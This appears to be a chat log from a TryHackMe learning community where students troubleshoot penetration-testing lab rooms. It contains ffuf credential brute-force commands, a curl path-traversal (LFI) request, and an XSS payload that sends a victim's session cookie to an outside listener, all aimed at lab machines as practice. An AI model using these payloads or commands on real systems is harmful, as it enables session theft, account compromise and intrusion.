I appreciate ya
Alright, I'm back again. I'm doing Linux PrivEsc task 10 (nfs). I'm getting an error after trying to execute the compiled script. Anyone know what's up?
I copied it exactly how it's written in the task
@raw bolt this is what I have and it works
ffuf -w ./valid_username.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.63.83/customers/login -fc 200
I just ran the command you used substituting IP addr and filename, and it worked for me.
maybe try killing the VM and starting a new one?
same
Is the wordlist path correct for your machine?
I think ffuf would throw an error if that was the case, but worth a look
@raw bolt This is the path for my machine which doesn't match the one directed ->>>> /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt
must be right because it spins up an error when I change the name of the file in the command
any special chars in the usernames?? what do you get with cat ./usernames.txt?
tried it with and without ./ still nothing
in the screenshot it looks like you opened the file in a text editor. if you use cat to get the contents do you see any additional characters?
Has anyone done the XSS room in the JR penetration path?
@raw bolt is the usernames.txt file in your current path? and if it is it seems like there is nothing in it
yes it is
this was the command from task 2
maybe I did it wrong the way I outputted it to the file?
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.196.158/customers/signup -mr "username already exists" >> username.txt
do you have 2 files in that dir? one named usernames.txt and the other username.txt?
what if you manually recreate the usernames.txt file?
getting nothing from cat username.txt is what concerns me. you should get the contents of the file
refer to the other screenshot
i redid step 2
thats where im at now
@blazing arrow https://ibb.co/c8QYDrX
and you removed the "crap".. got it
You guys having issues getting it to read the usernames file? I found a weird workaround for that if anyone can't get it to work
when I edit it now nothing appears when I cat it
please do share cause I've been on this task for WAY too long
what are you using to edit the file?
just opening it up in the text editor
What I did was went and found the wordlists already on the VM and changed the data inside one of those to the like 4 usernames you need. Then set that file location in place of saying usernames.txt in the command. (idk why it worked, but it did)
@raw bolt try using nano
ok
I agree. I really like nano. Super easy to use, too
sometimes text editors can leave unexpected characters
bro im about to skip this
now nothing cats when I edit it
like wtf
its so dumb
and yes i used nano
Could I DM you?
sure
last thing to try... create a new file, enter the usernames that you know are good , one per line, then re-run your ffuf command referencing your new file.
well holy fucking shit
that did it
wait
I spoke too soon
i got an error
no
I got it
making a new file did the trick
which is FKIN DUMB
oh nice, that didn't work for me, but glad you got it sorted out
@raw bolt @him and say thank you
Gave +1 Rep to @raw bolt
lol
@blazing arrow thank you
Gave +1 Rep to @blazing arrow
@raw bolt I'm glad you resolved it
how to redeem those tickets
On your profile there is a ticket tab you can go to. If you have 3 of a ticket you can redeem it
guys
I'm so lost and just braindead
how the freak do you do LFI for the last challenge, it literally filters out all special characters and numbers
I tried putting it in hex, base64, maybe I'll even try md5 😂
that is, we need to have all three Pentester Title vouchers to redeem it
?
Correct
Oh Okay thanks mate
No problem
I got one EJPT voucher
@modest arch what if you change the method on the form? Get or Post?
are you talking about the 3rd challenge? cause that def helped for the 1st one when it was doing get instead, but I will double check
yup, it helps on the 3rd challenge as well
Yo byrdman have you done XSS yet?
thanks man, I had it going through burp and everything so I'm surprised I didn't catch it
I haven't yet, I'm only a few days in
Damn. I can't find anyone that's on it.
@modest arch 🤙
I'm about to call it a day. but I'm plowing through and love helping. @crimson lark hopefully I can help you soon
Whenever you get to the end let me know lol.
@crimson lark I'm on it now, and it isn't accepting the cookie. Ran through it like 20 times.
Are you trying to view the staff session cookie?
yes
I swear it doesn't work. I tried for like 2 hours today and i know my code works because I can prompt my response.
The cookie that it is sending is your own cookie, that is why it doesn't accept it. Most likely you click into the "ticket" and that is why you're getting a callback
I can't get the "staff" cookie to send for the life of me
Agreed; I used both methods it suggests.
I don't even know how to escalate this, but it drives me crazy its not completed
what challenge is that for
XSS
This is so weird, for LFI I can't get the 3rd challenge to respond right to a post request
hey @spark sleet @crimson lark, try removing the extra space between two closing parentheses. document.cookie)" ")
it worked for me
are you kidding me
You still having issues with that?
did it work for you?
waiting for the callback right now
you're putting it in the comments right? Not the subject line?
yes, make sure to remove the { } too. just wanted to make sure.
||Are you using curl?||
i used request catcher
This the code. ||</textarea><script>fetch('http://0.0.0.0:4444?cookie=' + btoa(document.cookie));</script>||
yes, opening < is missing. and try with request catcher.
That was a typo.
I just got back and heard people were having issues with getting a response
Script port should be the same as the NC specified right
port can be any, as long as it's the same in the script and what you set up
@lavish rose , i tried to use the request catcher as well, and only get DNS entries.
are you opening the ticket after creating it?
No because that sends back my own session cookie
cookie is base64 encoded
Yes I decoded and it still did not work.
let me spawn my machine again
it decodes to session=.....
I came here for the above problem too hehe
I can't get a callback from an XSS script. Well.... I can get my own callback just not the "staff's"
i just solved it again: i'm using the same payload mentioned just changing url to request catcher like: ||ttp://str94de1e3bfc02e1e3007020825af9eea7.log.tryhackme.tech?|| and if i dont remove the extra space between two closing parentheses after "cookie) )" then i only get DNS request. but after removing that space i received the HTTP request with cookie.
if you're still having issue, you can dm me
thx, trying this now
- adding to @lavish rose , remove the spaces from cookie=' + btoa so it's cookie='+btoa
You are just so damn beautiful you know that.
My thanks
Gave +1 Rep to @lavish rose
need help ssrf task 2 pls
i had it like that, both at the same time until removing those.
@lavish rose thanks.
Gave +1 Rep to @lavish rose
Gonna need more info than that
glad i could help guys, now getting back to file inclusion challenge where i'm stuck hehe
try having a 504 error you will see
the payload structure and understand it better
thank you, this worked 🙂 I wonder why it didn't work via nc though
Gave +1 Rep to @lavish rose
I think the nc way is really broken because I was able to get my own cookie sent.
nope just get one 504 then read the structure
on that point you can understand how the payload works
@drifting drum yeah
How are you structuring your request?
@opal stirrup ||curl -X POST -d "file=../../../../../../etc/flag3" http://10.10.227.104/lab3.php||
||You're sending it to lab 3 and not challenge 3 and IIRC -d should come after the URL||
what are the results?
||Keep in mind the number of directories as well||
no freaking way that's literally it
I'm so dumb
I was working the wrong challenge 🤦♂️
Lmao you're good man, I spent 3 hours on RCE before I realized I was using the wrong fucking IP
😂
ha I just did that too
Now I'm just wondering why my NC listener wouldn't get the XSS callback but the THM URL did 😐
yeah same
I reloaded that machine like 3 times before I even got a response doing the exact same thing
I couldn't get it to work with NC either
Congrats!
Lmao. You and I both. I just went through the Linux privesc room. Spent 2 hours on one task cuz the questions are messed up (that was confirmed by THM staff) and then spent another 2 hours on the next task trying to figure out why some code wouldn't compile. Turns out I'm an absolute moron and read the instructions wrong 6 times in a row
A lot of people are having this problem, do you reckon we are just noobing or should we inform staff? ( if that hasn't happened already )
[SOLVED]
Hey guys,
I'm stuck on Content Discovery > Part 4.
Can't seem to reach the /sitemap.xml.
Tried firefox, chromium, curl. /robots.txt from the step before works just fine. Am I missing something obvious? 🤔
Thanks in advance
I'm on LFI TASK 8 flag 2 dying
bro I spent all day finishing LFI ngl
I just started this path, and I am really enjoying the process. Thanks!
Anyone in the Authentication Bypass room?
Need some help
I've tried converting the results of the usernames to a .txt file however it's not working
This step 3 of the brute force won't give proper results
I love this path ngl! It's been mind warping, my head hurts chronically now, I've talked with people in a drunken daze, high on nothing but THM flags, and had some of the coolest victories I've had with aspects of pentesting I've never experienced really
I just made the txt file manually since it is only a few usernames you get
i did not use ffuf for bruteforce not sure if its ok i tried hydra for that
Oh yeah? Thank you! I've actually tried doing that myself since it was just 4 users
However when i run the bruteforce command for ffuf
It provides no results
Gonna try strong arming this thing
I found it difficult to get it to work as well
it was hard for me to understand ffuf output at first 😂
Yeah it's confusing as hell especially for a noob like me lol
Hey, is anyone in the "Walking An Application" room > Task 3 Viewing The Page Source > Question 4 "What is the framework flag?", got to a new flag after reading the documentation etc, but still getting the "your answer is incorrect" message with that new flag? (I guess what I'm asking is, does THM have false flags?)
For me I didn't even realize it was doing what I wanted it to until I looked closely and saw that it did in fact have the usernames
Yeah I made the username list manually also
Then the password brute force output is pretty straight forward
Hmm okay let me try that again in that case
Wish i could attach pictures here lol
But thanks for the help! Appreciate the support guys
If you verify with the tryhackme bot you can send pics
It may be a flag for another task
Gotta dig a little deeper for that one, remember struggling with it as well 😅
Okay, thank you! The directions were rather specific so I couldn't tell if I stumbled onto a different flag for another task (like @midnight maple said) or if something was actually wrong haha
Gave +1 Rep to @chrome sand
No idea. Would probably let staff know so they could look into it, but it's not major
BRUHHH, I FRIKKEN GOT IT
LOL man the sigh of relief lol
I'm planning on doing this path, then straight on to actual JPT training so my mind is gonna die
But it would still be good to learn how to automate it with the command for future ref in case of larger files
Yeah I'm on a similar path fam
Best of luck!